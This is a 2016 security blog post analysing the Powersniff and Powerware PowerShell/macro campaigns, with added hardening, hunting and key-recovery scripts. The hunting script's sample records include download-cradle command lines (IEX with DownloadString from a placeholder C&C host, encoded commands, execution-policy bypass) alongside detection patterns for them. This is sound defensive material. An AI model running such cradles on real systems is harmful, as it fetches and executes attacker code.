Attackers Making Use Of PowerShell and Macros for Malicious Activity

By John Atienza on April 1, 2016


Malicious MS-Office macros are being used both to compromise machines and to deliver ransomware. Powersniff is file-less malware that runs entirely in memory; Powerware is ransomware that runs via PowerShell. Powersniff victims are mostly in the United States, but Europe and, in particular, Canada were also affected. Powerware was first seen targeting a healthcare organization, according to researchers at Carbon Black. The following is a breakdown of both attacks and their weaknesses / counter-measures.

Cyber Kill Chain Breakdown

  1. Reconnaissance – Collection of email addresses of possible victims (the Powersniff campaign targeted no specific industry, but most of the emails went to professional services, hospitality, manufacturing, wholesale, energy, and high-tech organizations).
  2. Weaponization – Malicious macro in a MS-Office document
  3. Delivery – Spam emails with the attached malicious Word document
  4. Exploitation – The user is tricked into opening the malicious Word document. If macros are disabled, the document asks the user to enable them; otherwise the macro executes automatically. This is where Word documents with malicious macros can be stopped: organizations need user security awareness training and macros disabled in MS Office (or, at a minimum, blocked in documents that arrived from the Internet).
  5. Installation –
    1. Powersniff (Ursnif family) is sandbox- and VM-aware. It uses Windows Management Instrumentation (WMI) to launch a hidden instance of PowerShell through the command prompt and runs entirely in memory. If the system is locked down, Powersniff requests permission to run. PowerShell downloads a shellcode script and places it in a location that depends on whether the target operating system is 32- or 64-bit; the shellcode is decrypted and executes the payload. The malware then scans the machine for strings that reveal what kind of host it has infected: if the victim is in healthcare or education it skips the target, but “financial systems (ex: POS systems) are preferred and marked.” Cached URLs are checked for Citrix, XenApp, and dana-na (Juniper VPN).
    2. Powerware (PowerShell ransomware) launches two instances of PowerShell via cmd.exe: one downloads the ransomware script, the other is used for input. The script generates random numbers for the encryption key and assigns a UUID to the victim's computer.
  6. Command & Control –
    1. Powersniff – Connects to C&C servers (Palo Alto Networks could not find any responsive C&C servers at the time of this research)
    2. Powerware – The script sends the encryption key and the UUID to the attacker over HTTP in plaintext. This is an operational weakness: victims with a full packet capture solution can identify the C&C domain and IP and retrieve the encryption key from the capture. After communicating with the C&C server, the script encrypts files with specific extensions; the list covers a broad range of file formats. An HTML file with instructions on how to pay the $500 ransom is placed in every folder where files have been encrypted.
  7. Actions on Objectives –
    1. Powersniff – Not enough data
    2. Powerware – None.
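The exploitation step above is where the chain can be cut by configuration. The script below is an added example, not code from the original article or from the researchers it cites: it sets the registry values behind the Office macro policies and the PowerShell logging policies, to be run from an elevated PowerShell on a workstation or deployed through Group Policy. It assumes Office 2016 (version key "16.0") and PowerShell 5.0 or later for script block logging; adjust the version key for other Office releases.

```powershell
# Added example (not from the original article): registry values behind the
# Office macro policies and PowerShell logging policies that blunt this chain.
# Assumptions: Office 2016 (version key "16.0"), PowerShell 5.0+ on Windows.

$officeVersion = '16.0'
$officeApps    = 'Word', 'Excel', 'PowerPoint'

function Set-OfficeMacroPolicy {
    param(
        # -BlockAll: disable all macros without notification (VBAWarnings = 4),
        # so a document cannot even show the "Enable Content" prompt.
        # Default: keep "disable with notification" (VBAWarnings = 2) but block
        # macros in files carrying the Mark-of-the-Web, i.e. anything downloaded
        # or received as a mail attachment, which is how these campaigns arrive.
        [switch]$BlockAll
    )
    foreach ($app in $officeApps) {
        $sec = "HKCU:\Software\Policies\Microsoft\Office\$officeVersion\$app\Security"
        if (-not (Test-Path $sec)) { New-Item -Path $sec -Force | Out-Null }
        if ($BlockAll) {
            Set-ItemProperty -Path $sec -Name 'VBAWarnings' -Type DWord -Value 4
        } else {
            Set-ItemProperty -Path $sec -Name 'VBAWarnings' -Type DWord -Value 2
            Set-ItemProperty -Path $sec -Name 'blockcontentexecutionfrominternet' -Type DWord -Value 1
        }
    }
}

function Enable-PowerShellLogging {
    # Script block logging (Event ID 4104, Microsoft-Windows-PowerShell/Operational)
    # records the de-obfuscated text of every script block that runs, including a
    # downloader stager or the ransomware script itself, even when nothing touches disk.
    $sbl = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path $sbl)) { New-Item -Path $sbl -Force | Out-Null }
    Set-ItemProperty -Path $sbl -Name 'EnableScriptBlockLogging' -Type DWord -Value 1

    # Module logging (Event ID 4103) records pipeline execution details for all modules.
    $ml      = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging'
    $mlNames = "$ml\ModuleNames"
    foreach ($k in $ml, $mlNames) {
        if (-not (Test-Path $k)) { New-Item -Path $k -Force | Out-Null }
    }
    Set-ItemProperty -Path $ml -Name 'EnableModuleLogging' -Type DWord -Value 1
    # The value name "*" means "all modules"; New-ItemProperty -Force overwrites if present.
    New-ItemProperty -Path $mlNames -Name '*' -Value '*' -PropertyType String -Force | Out-Null
}

function Get-MacroPolicy {
    # Read back what is in force, to verify the change or to audit another host.
    foreach ($app in $officeApps) {
        $sec = "HKCU:\Software\Policies\Microsoft\Office\$officeVersion\$app\Security"
        $p = Get-ItemProperty -Path $sec -ErrorAction SilentlyContinue
        [pscustomobject]@{
            App               = $app
            VBAWarnings       = $p.VBAWarnings
            BlockFromInternet = $p.blockcontentexecutionfrominternet
        }
    }
}

Set-OfficeMacroPolicy            # or: Set-OfficeMacroPolicy -BlockAll
Enable-PowerShellLogging
Get-MacroPolicy
```

Values written under HKCU\Software\Policies are the per-user policy keys that Group Policy itself writes, so users cannot undo them from the Trust Center; the equivalent HKLM\Software\Policies keys apply machine-wide. Script block logging is what turns an in-memory PowerShell stager into something a SIEM can read, which matters for file-less malware such as Powersniff.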
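Both installation paths above leave the same footprint in process-creation telemetry: an Office application spawning cmd.exe or PowerShell, PowerShell started by the WMI provider host, and PowerShell command lines with a hidden window, a bypassed execution policy, an encoded command or a download cradle. The following hunting logic is an added example, not code from the article; the $events list is constructed sample data shaped like the Image, ParentImage and CommandLine fields of Sysmon Event ID 1 (Security event 4688 with command-line auditing carries the same fields), and the host name and URL in it are placeholders. In production the records would come from Get-WinEvent against the Sysmon or Security log.

```powershell
# Added example (not from the original article): hunting the macro -> cmd.exe
# -> PowerShell chain and the WMI-launched variant in process-creation records.
# $events is constructed sample data; c2.example.invalid is a placeholder host.

$events = @(
    [pscustomobject]@{
        Image       = 'C:\Windows\System32\cmd.exe'
        ParentImage = 'C:\Program Files\Microsoft Office\Office16\WINWORD.EXE'
        CommandLine = 'cmd.exe /c powershell -w hidden -ep bypass -c IEX (New-Object Net.WebClient).DownloadString(''http://c2.example.invalid/p.ps1'')'
    }
    [pscustomobject]@{
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentImage = 'C:\Windows\System32\cmd.exe'
        CommandLine = 'powershell -w hidden -ep bypass -c IEX (New-Object Net.WebClient).DownloadString(''http://c2.example.invalid/p.ps1'')'
    }
    [pscustomobject]@{
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentImage = 'C:\Windows\System32\wbem\WmiPrvSE.exe'
        CommandLine = 'powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA'
    }
    [pscustomobject]@{   # benign: an administrator opening an interactive console
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        ParentImage = 'C:\Windows\explorer.exe'
        CommandLine = 'powershell.exe'
    }
)

$officeApps = 'WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE'
$shells     = 'cmd.exe', 'powershell.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe'

function Test-SuspiciousProcess {
    # Returns the reasons one process-creation record matches the chain;
    # returns nothing when it is clean. String comparisons are case-insensitive.
    param([Parameter(Mandatory)] $Record)
    $image   = $Record.Image       -replace '^.*[\\/]', ''   # file name only
    $parent  = $Record.ParentImage -replace '^.*[\\/]', ''
    $cmd     = [string]$Record.CommandLine
    $reasons = @()

    # An Office application has no business spawning a shell or script host.
    if ($officeApps -contains $parent -and $shells -contains $image) {
        $reasons += "Office application $parent spawned $image"
    }
    # PowerShell launched through WMI runs under the WMI provider host.
    if ($parent -eq 'WmiPrvSE.exe' -and $image -eq 'powershell.exe') {
        $reasons += 'PowerShell launched by the WMI provider host'
    }
    if ($image -eq 'powershell.exe') {
        if ($cmd -match '-w(indowstyle)?\s+hid')                          { $reasons += 'hidden window' }
        if ($cmd -match '-e(p|xec(utionpolicy)?)?\s+bypass')              { $reasons += 'execution policy bypass' }
        if ($cmd -match '-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}')    { $reasons += 'encoded command' }
        if ($cmd -match 'DownloadString|DownloadFile|Net\.WebClient|\bIEX\b|Invoke-Expression') {
            $reasons += 'download cradle / IEX'
        }
    }
    return $reasons
}

function Find-SuspiciousProcesses {
    param([Parameter(Mandatory)] [object[]]$Records)
    foreach ($r in $Records) {
        $why = Test-SuspiciousProcess -Record $r
        if ($why) {
            [pscustomobject]@{
                Parent  = $r.ParentImage -replace '^.*[\\/]', ''
                Image   = $r.Image       -replace '^.*[\\/]', ''
                Reasons = ($why -join '; ')
            }
        }
    }
}

Find-SuspiciousProcesses -Records $events | Format-Table -AutoSize
```

The first three constructed records are flagged and the interactive console is not. The parent-child rule is the one worth alerting on by itself; the command-line patterns are corroboration, since legitimate automation also uses -WindowStyle Hidden and -EncodedCommand.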
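The operational weakness called out under Command & Control is that the key leaves the victim in a plaintext HTTP request, so anyone holding a packet capture of that session holds the key. The parser below is an added example, not code from the article or from the Carbon Black research: the captured request is a constructed sample (the real Powerware request layout, parameter names and C&C host are not given in the article), so instead of assuming field names it decodes every form field and picks out the values by shape, a UUID and the longest digit- or hex-only value.

```powershell
# Added example (not from the original article): recovering the victim UUID and
# the encryption key from a plaintext HTTP request exported from packet capture.
# $capturedRequest is a constructed sample; field names and host are placeholders.

$capturedRequest = @"
POST /beacon.php HTTP/1.1
Host: c2.example.invalid
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

uuid=3f2504e0-4f89-11d3-9a0c-0305e82c3301&key=48917364251234567890123456789012&ver=1
"@

function Get-RansomKeyFromRequest {
    param([Parameter(Mandatory)][string]$Request)

    # The HTTP body starts after the first blank line (CRLF or LF line endings).
    $parts = $Request -split "\r?\n\r?\n", 2
    if ($parts.Count -lt 2) { return $null }
    $body = $parts[1].Trim()

    # Decode application/x-www-form-urlencoded pairs without trusting their names.
    $fields = @{}
    foreach ($pair in ($body -split '&')) {
        $kv = $pair -split '=', 2
        if ($kv.Count -eq 2) {
            $fields[[uri]::UnescapeDataString($kv[0])] = [uri]::UnescapeDataString($kv[1])
        }
    }

    $uuidPattern = '^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$'
    $uuid = $fields.Values | Where-Object { $_ -match $uuidPattern } | Select-Object -First 1

    # The key is built from random numbers, so take the longest value that is
    # made up only of digits or hex characters and is not the UUID itself.
    $key = $fields.Values |
        Where-Object { $_ -match '^[0-9A-Fa-f]{16,}$' -and $_ -ne $uuid } |
        Sort-Object Length -Descending |
        Select-Object -First 1

    # The Host header identifies the C&C domain to block and to pivot on.
    $hostHeader = [regex]::Match($Request, '(?im)^Host:\s*(\S+)').Groups[1].Value

    [pscustomobject]@{
        C2Host = $hostHeader
        UUID   = $uuid
        Key    = $key
        Fields = $fields
    }
}

Get-RansomKeyFromRequest -Request $capturedRequest
```

On the constructed sample this returns the UUID, the 32-digit key and the C&C host. The same approach works on a request body carved out of a PCAP with tshark or Wireshark's "Follow TCP Stream"; the point is that the capture must already exist when the infection happens, since the key is transmitted once and never stored on the victim.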